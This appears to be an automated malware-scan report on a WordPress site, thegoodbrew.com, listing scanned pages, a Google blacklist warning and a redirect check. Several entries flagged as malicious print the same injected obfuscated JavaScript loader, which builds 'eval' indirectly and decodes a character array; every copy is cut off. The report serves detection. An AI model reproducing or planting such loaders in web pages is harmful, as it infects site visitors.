Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thegoodbrew.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.thegoodbrew.com/ | 200 OK Content-Length: 20719 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112, Antivirus reports:
| ||
http://www.thegoodbrew.com/wordpress/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://www.thegoodbrew.com/wordpress/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.thegoodbrew.com/wordpress/wp-content/plugins/sell-media/js/sell_media.js?ver=1.7 | 200 OK Content-Length: 40842 Content-Type: application/javascript | clean |
http://www.thegoodbrew.com/?page_id=2 | 200 OK Content-Length: 11098 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112, Antivirus reports:
| ||
http://www.thegoodbrew.com/wordpress/wp-includes/js/comment-reply.min.js?ver=1007 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.thegoodbrew.com/?page_id=284 | 200 OK Content-Length: 3381 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112, Antivirus reports:
| ||
http://www.thegoodbrew.com/test404page.js | 404 Not Found Content-Length: 451 Content-Type: text/html | clean |
http://www.thegoodbrew.com/?page_id=401 | 200 OK Content-Length: 10498 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112, Antivirus reports:
| ||
http://www.thegoodbrew.com/wordpress/wp-includes/js/comment-reply.min.js?ver=4957 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.thegoodbrew.com/?page_id=414 | 200 OK Content-Length: 10420 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112, Antivirus reports:
| ||
http://www.thegoodbrew.com/wordpress/wp-includes/js/comment-reply.min.js?ver=3023 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://www.thegoodbrew.com/wordpress/wp-login.php?redirect_to=http%3A%2F%2Fwww.thegoodbrew.com%2F%3Fpage_id%3D2 | 200 OK Content-Length: 4670 Content-Type: text/html | clean |
http://www.thegoodbrew.com/wordpress/wp-login.php?action=register | 200 OK Content-Length: 4526 Content-Type: text/html | clean |
http://www.thegoodbrew.com/wordpress/wp-login.php | 200 OK Content-Length: 4670 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thegoodbrew.com
Result:
GET / HTTP/1.1
Host: thegoodbrew.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: thegoodbrew.com
Referer: http://www.google.com/search?q=thegoodbrew.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thegoodbrew.com
Referer: http://www.google.com/search?q=thegoodbrew.com
Result:
The result is similar to the first query. There are no suspicious redirects found.